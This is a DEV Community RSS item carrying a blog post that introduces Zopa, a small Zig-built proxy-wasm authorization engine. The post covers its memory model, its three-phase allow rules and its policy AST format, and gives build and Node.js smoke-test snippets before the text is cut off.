<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: kt</title>
    <description>The latest articles on DEV Community by kt (@kanywst).</description>
    <link>https://dev.to/kanywst</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/kanywst"/>
    <language>en</language>
    <item>
      <title>Introducing Zopa: a 60 KB authorization engine for proxy-wasm, written in Zig</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Sun, 10 May 2026 07:37:50 +0000</pubDate>
      <link>https://dev.to/kanywst/introducing-zopa-a-60-kb-authorization-engine-for-proxy-wasm-written-in-zig-1l66</link>
      <guid>https://dev.to/kanywst/introducing-zopa-a-60-kb-authorization-engine-for-proxy-wasm-written-in-zig-1l66</guid>
      <description>&lt;p&gt;There are plenty of times you want to delegate "let this request through, or block it" to a wasm filter inside Envoy. API gateways, service mesh boundaries, L7 checkpoints. The default move is to use OPA's wasm build.&lt;/p&gt;

&lt;p&gt;The trouble is OPA-as-wasm is heavy. The Go runtime, the Rego parser, and the evaluator are all in there. You only want to return allow/deny at the edge, but you ship something many times the size of the evaluator. Cedar and Casbin don't ship official wasm builds (as of May 2026). The slot for "drop-in proxy-wasm authorization filter" is empty.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/0-draft/zopa" rel="noopener noreferrer"&gt;zopa&lt;/a&gt; is what I built to fill that slot. A Zig &lt;code&gt;wasm32-freestanding&lt;/code&gt; binary, ~60 KB at release. No GC; memory turns over on a per-request arena. It runs on any host that implements proxy-wasm 0.2.1 (Envoy / wasmtime / wamr / v8).&lt;/p&gt;

&lt;h2&gt;
  
  
  Big picture
&lt;/h2&gt;

&lt;p&gt;Zopa assumes you separate &lt;strong&gt;where you write policy&lt;/strong&gt; from &lt;strong&gt;where you evaluate it&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe5tld6tadgzo8cwx4f6l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe5tld6tadgzo8cwx4f6l.png" alt="zopa" width="514" height="748"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Policy authors write rules in Rego (OPA's policy language; a declarative DSL in the Datalog family). The CI converts that to AST (Abstract Syntax Tree) JSON. At Envoy startup the AST is handed to the wasm module as plugin config; on each incoming request, zopa evaluates and returns 1 or 0.&lt;/p&gt;

&lt;p&gt;There's exactly one design call here: &lt;strong&gt;don't ship a language compiler inside the wasm module&lt;/strong&gt;. OPA wasm is large because the Rego parser and evaluator are bundled together. Zopa pushes the parser out of the wasm (into a CI job) and keeps the wasm module focused on evaluation. That alone moves the binary size by orders of magnitude.&lt;/p&gt;

&lt;h2&gt;
  
  
  proxy-wasm refresher
&lt;/h2&gt;

&lt;p&gt;proxy-wasm is the ABI spec for "filters in wasm" used by Envoy and friends. Most famous in Envoy, but anything embedding wasmtime / wamr / v8 can host it.&lt;/p&gt;

&lt;p&gt;Three points cover the host/wasm relationship:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The host calls into wasm exports at request milestones (&lt;code&gt;proxy_on_request_headers&lt;/code&gt; etc.).&lt;/li&gt;
&lt;li&gt;The wasm pulls header values back through host imports (&lt;code&gt;proxy_get_header_map_value&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;Allow does nothing (Envoy continues). Deny asks the host to call &lt;code&gt;proxy_send_local_response(403)&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Zopa implements proxy-wasm 0.2.1. Spec body: &lt;a href="https://github.com/proxy-wasm/spec" rel="noopener noreferrer"&gt;proxy-wasm/spec&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why it fits in 60 KB
&lt;/h2&gt;

&lt;p&gt;The build:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;zig build &lt;span class="nt"&gt;--release&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;small
&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-lh&lt;/span&gt; zig-out/bin/zopa.wasm
&lt;span class="c"&gt;# -rw-r--r-- 1 you staff 60K  zopa.wasm&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Three things drive the size:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;wasm32-freestanding&lt;/code&gt; target.&lt;/strong&gt; No WASI (the wasm syscall spec). No OS, no syscalls, only a thin slice of stdlib. &lt;code&gt;freestanding&lt;/code&gt; drops every file I/O / network stub.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No GC.&lt;/strong&gt; Zig has no garbage collector (like Rust, ownership is explicit and memory is hand-managed). The GC code and management metadata simply don't exist.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Zero deps.&lt;/strong&gt; Nothing outside Zig stdlib. The JSON parser is hand-rolled (recursive descent) in &lt;code&gt;src/json.zig&lt;/code&gt;, surrogate-pair handling included, in a few hundred lines.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;OPA's wasm is large because it carries the Go runtime (with GC), the Rego parser, and the evaluator. Zopa took the opposite call on every point. The result is 60 KB.&lt;/p&gt;

&lt;h2&gt;
  
  
  Memory model
&lt;/h2&gt;

&lt;p&gt;Zopa's heart is the memory layout. Two allocators, with different lifetimes and roles.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fviuwqw6lqy5ld5c3z2e5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fviuwqw6lqy5ld5c3z2e5.png" alt="memory model" width="800" height="401"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;host_allocator&lt;/code&gt; is Zig stdlib's &lt;code&gt;std.heap.wasm_allocator&lt;/code&gt;, a freelist-style allocator. It backs every buffer that crosses the host boundary. Lifetime: the whole module.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;request_arena&lt;/code&gt; is &lt;code&gt;std.heap.ArenaAllocator&lt;/code&gt;. Per-request scratch space. We call &lt;code&gt;reset(.retain_capacity)&lt;/code&gt; at the end of &lt;code&gt;evaluate()&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;An arena means "alloc as much as you want; everything goes away at the end". No individual &lt;code&gt;free&lt;/code&gt; calls. With &lt;code&gt;retain_capacity&lt;/code&gt;, the wasm linear memory pages aren't returned, so the next request reuses the existing capacity.&lt;/p&gt;

&lt;p&gt;Net effect: after warmup, &lt;code&gt;memory.grow&lt;/code&gt; (the wasm heap-grow instruction) stops firing. Throughput goes up; memory stays roughly flat. That's the source of that property.&lt;/p&gt;

&lt;p&gt;The single rule that ties it together: &lt;strong&gt;a pointer minted by one allocator must only be released by the matching free path&lt;/strong&gt;. The proxy-wasm shim returns host-malloc'd buffers via the host's free; the evaluator never calls &lt;code&gt;free&lt;/code&gt; directly and instead leans on the arena reset.&lt;/p&gt;

&lt;h2&gt;
  
  
  Three-phase target rules
&lt;/h2&gt;

&lt;p&gt;Zopa makes the decision independently in three HTTP phases. Each phase is bound to &lt;strong&gt;a different target rule name&lt;/strong&gt;; if your policy contains a rule with that name, the phase fires; if not, the phase passes through silently.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Phase&lt;/th&gt;
&lt;th&gt;Target rule&lt;/th&gt;
&lt;th&gt;Input shape&lt;/th&gt;
&lt;th&gt;On deny&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;proxy_on_request_headers&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;allow&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{method, path, headers}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;403&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;proxy_on_request_body&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;allow_body&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{body, body_raw}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;403 + Pause&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;proxy_on_response_headers&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;allow_response&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{response: {status, headers}}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;503&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The key point: a policy with only an &lt;code&gt;allow&lt;/code&gt; rule sails past the body and response phases untouched. At configure time we parse the policy JSON and remember whether &lt;code&gt;allow_body&lt;/code&gt; / &lt;code&gt;allow_response&lt;/code&gt; rules exist as bools; if they don't, the matching callbacks return &lt;code&gt;Continue&lt;/code&gt; directly.&lt;/p&gt;

&lt;h2&gt;
  
  
  What happens during one request
&lt;/h2&gt;

&lt;p&gt;When Envoy hands a single request to zopa, this is the timeline inside.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fraw.githubusercontent.com%2F0-draft%2Fdev.to%2Fmain%2Farticles%2Fassets%2Fintroducing-zopa%2Frequest-flow.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fraw.githubusercontent.com%2F0-draft%2Fdev.to%2Fmain%2Farticles%2Fassets%2Fintroducing-zopa%2Frequest-flow.png" alt="request flow" width="800" height="1798"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Three takeaways:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The policy AST is &lt;strong&gt;handed to us once at startup&lt;/strong&gt; and copied into host_allocator. We don't re-receive it per request.&lt;/li&gt;
&lt;li&gt;Every phase ends with &lt;code&gt;arena.reset&lt;/code&gt;. Zopa carries no data across phase or request boundaries.&lt;/li&gt;
&lt;li&gt;The body and response phases only run eval &lt;strong&gt;when the matching rule exists&lt;/strong&gt;. The policy opts each phase in by writing a rule with that name.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;code&gt;evaluate()&lt;/code&gt; returns a plain &lt;code&gt;i32&lt;/code&gt;:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Return&lt;/th&gt;
&lt;th&gt;Meaning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;1&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;allow. The target rule fired with a truthy value.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;0&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;deny. No rule fired and no truthy default rule was present.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-1&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;error. Parse failure, unknown node, recursion cap, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The proxy-wasm shim treats &lt;code&gt;-1&lt;/code&gt; the same as deny (broken policies block by default).&lt;/p&gt;

&lt;h2&gt;
  
  
  Policy AST
&lt;/h2&gt;

&lt;p&gt;Zopa's input isn't Rego source; it's AST-shaped JSON. The supported nodes mirror a subset of Rego.&lt;/p&gt;

&lt;p&gt;"&lt;code&gt;role&lt;/code&gt; equals &lt;code&gt;admin&lt;/code&gt; → allow" looks like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"module"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"rules"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"rule"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"allow"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"default"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"value"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"value"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"value"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"rule"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"allow"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"body"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"eq"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"left"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ref"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"path"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"input"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"user"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"role"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"right"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"value"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"value"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"admin"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The evaluation rule is "OR every rule whose &lt;code&gt;name&lt;/code&gt; is &lt;code&gt;"allow"&lt;/code&gt;". If any body holds, &lt;code&gt;allow=true&lt;/code&gt;. A &lt;code&gt;default=true&lt;/code&gt; rule's value is the fallback for when nothing else fires.&lt;/p&gt;

&lt;p&gt;Supported node types:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Node&lt;/th&gt;
&lt;th&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;value&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Literal (any JSON value)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ref&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Path lookup, e.g. walking &lt;code&gt;input.user.role&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;compare&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Binary compare. &lt;code&gt;eq&lt;/code&gt; / &lt;code&gt;neq&lt;/code&gt; / &lt;code&gt;lt&lt;/code&gt; / &lt;code&gt;lte&lt;/code&gt; / &lt;code&gt;gt&lt;/code&gt; / &lt;code&gt;gte&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;not&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Logical negation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;set&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Set literal&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;some&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Existential quantifier: "some element x makes body true"&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;every&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Universal quantifier: "every element x makes body true"&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;call&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Builtin function call.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;module&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;A set of rules. Optional &lt;code&gt;package&lt;/code&gt; field carries the package name.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;modules&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Module bundle: multiple packages co-resident in a single VM.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;rule&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;A single rule with &lt;code&gt;body&lt;/code&gt; (AND) and &lt;code&gt;value&lt;/code&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;code&gt;call&lt;/code&gt; ships with these four builtins:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Name&lt;/th&gt;
&lt;th&gt;Args&lt;/th&gt;
&lt;th&gt;Returns&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;startswith&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;(string, string)&lt;/td&gt;
&lt;td&gt;bool&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;endswith&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;(string, string)&lt;/td&gt;
&lt;td&gt;bool&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;contains&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;(string, string)&lt;/td&gt;
&lt;td&gt;bool&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;count&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;(array / set / object / string)&lt;/td&gt;
&lt;td&gt;number&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;code&gt;some&lt;/code&gt; / &lt;code&gt;every&lt;/code&gt; also iterate over JSON objects: pick &lt;code&gt;kind: "keys"&lt;/code&gt; (default) or &lt;code&gt;kind: "values"&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Zopa doesn't reach the full Rego (user-defined functions, &lt;code&gt;with&lt;/code&gt; clauses, partial evaluation, imports, etc.). The scope is "decide allow/deny at the edge". Full reference: &lt;a href="https://github.com/0-draft/zopa/blob/main/docs/ast.md" rel="noopener noreferrer"&gt;&lt;code&gt;docs/ast.md&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Try it
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Build
&lt;/h3&gt;

&lt;p&gt;You need Zig 0.16.0:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;brew &lt;span class="nb"&gt;install &lt;/span&gt;zig
git clone https://github.com/0-draft/zopa
&lt;span class="nb"&gt;cd &lt;/span&gt;zopa
zig build &lt;span class="nt"&gt;--release&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;small
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Drive it directly (Node.js)
&lt;/h3&gt;

&lt;p&gt;Call &lt;code&gt;evaluate(input, ast)&lt;/code&gt; without going through proxy-wasm. Useful as a smoke test before standing up Envoy.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;readFileSync&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;node:fs&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;instance&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;WebAssembly&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;instantiate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="nf"&gt;readFileSync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;zig-out/bin/zopa.wasm&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
  &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="na"&gt;proxy_log&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;proxy_get_buffer_bytes&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;proxy_get_header_map_pairs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;proxy_get_header_map_value&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;proxy_send_local_response&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;}},&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;
